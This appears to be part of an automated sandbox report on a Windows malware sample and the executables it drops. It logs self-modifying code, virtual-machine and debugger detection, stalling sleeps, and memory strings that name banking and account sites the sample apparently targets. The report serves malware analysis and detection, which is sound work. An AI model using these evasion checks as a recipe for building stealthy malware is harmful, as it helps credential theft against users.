Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Special instruction interceptor: First address: 1015F7B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Special instruction interceptor: First address: 102BFAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Special instruction interceptor: First address: 10AA8D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CA775A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CA5F7B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CBBFAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D3A8D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 105EB8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 1203A9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 122DB4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 1218E15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 105EAC4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 1292BCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 42D9CF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 42DAB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 5D726D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 5D5B39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 5D5760 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 5FB617 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 42D97E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: A4DDF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: C03DB8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: C2F7D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: A4DDF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: C9F7B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Special instruction interceptor: First address: BF775A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Special instruction interceptor: First address: BF5F7B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Special instruction interceptor: First address: C0BFAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Special instruction interceptor: First address: C8A8D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: E1DDF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: FD3DB8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: FFF7D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: E1DDF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Special instruction interceptor: First address: 11E775A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Special instruction interceptor: First address: 11E5F7B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Special instruction interceptor: First address: 11FBFAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: 106F7B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Special instruction interceptor: First address: 127A8D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Memory allocated: 5310000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Memory allocated: 54C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Memory allocated: 74C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Memory allocated: 54D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Memory allocated: 5690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Memory allocated: 7690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Memory allocated: 48B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Memory allocated: 4C30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Memory allocated: 4A50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAD585 rdtsc 3_2_00CAD585
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBDF01 sidt fword ptr [esp-02h] 3_2_00CBDF01
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 473
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 486
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1697
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1951
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1933
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 477
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Window / User API: threadDelayed 392
Source: C:\Users\user\Desktop\file.exe TID: 6540 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe TID: 504 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4048 Thread sleep count: 473 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4048 Thread sleep time: -946473s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1944 Thread sleep count: 486 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1944 Thread sleep time: -972486s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6540 Thread sleep count: 273 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6540 Thread sleep time: -8190000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5308 Thread sleep count: 1697 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5308 Thread sleep time: -3395697s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1880 Thread sleep count: 1951 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1880 Thread sleep time: -3903951s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2760 Thread sleep count: 1933 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2760 Thread sleep time: -3867933s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 964 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1968 Thread sleep count: 477 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1968 Thread sleep time: -954477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe TID: 1016 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe TID: 6940 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe TID: 7080 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe TID: 7044 Thread sleep count: 128 > 30
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe TID: 7044 Thread sleep count: 146 > 30
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe TID: 3616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe TID: 1408 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe TID: 5940 Thread sleep count: 392 > 30
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe TID: 5940 Thread sleep count: 147 > 30
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe TID: 6940 Thread sleep time: -96000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe TID: 5392 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Thread delayed: delay time: 922337203685477
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2507260768.0000000000CB2000.00000040.00000001.01000000.00000006.sdmp, S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, 00000004.00000002.2427168809.0000000000FF9000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2465538734.0000000000C89000.00000040.00000001.01000000.0000000B.sdmp, 7451ae0b11.exe, 0000000B.00000002.3003413750.00000000005B8000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, file.exe, 00000000.00000003.2218579742.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173591731.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FB2000.00000004.00000020.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3225777769.0000019E3D140000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: firefox.exe, 0000001A.00000002.3228922756.0000019E471AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.000000000602D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 58ce8f976c.exe, 0000000A.00000003.2944432729.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Pa5EAKvthdjN8x+2wmzDJakYn5ahGFs6BBUbN_
Source: file.exe, 00000000.00000003.2186543484.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186331939.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186701959.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214986734.0000000005BE5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214639529.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214723198.0000000005BE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186170971.0000000005BD2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197032834.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197243172.0000000005BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: lqeMuUnwoUAFmVCh
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2507260768.0000000000CB2000.00000040.00000001.01000000.00000006.sdmp, S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, 00000004.00000002.2427168809.0000000000FF9000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2465538734.0000000000C89000.00000040.00000001.01000000.0000000B.sdmp, 7451ae0b11.exe, 0000000B.00000002.3003413750.00000000005B8000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process queried: DebugPort
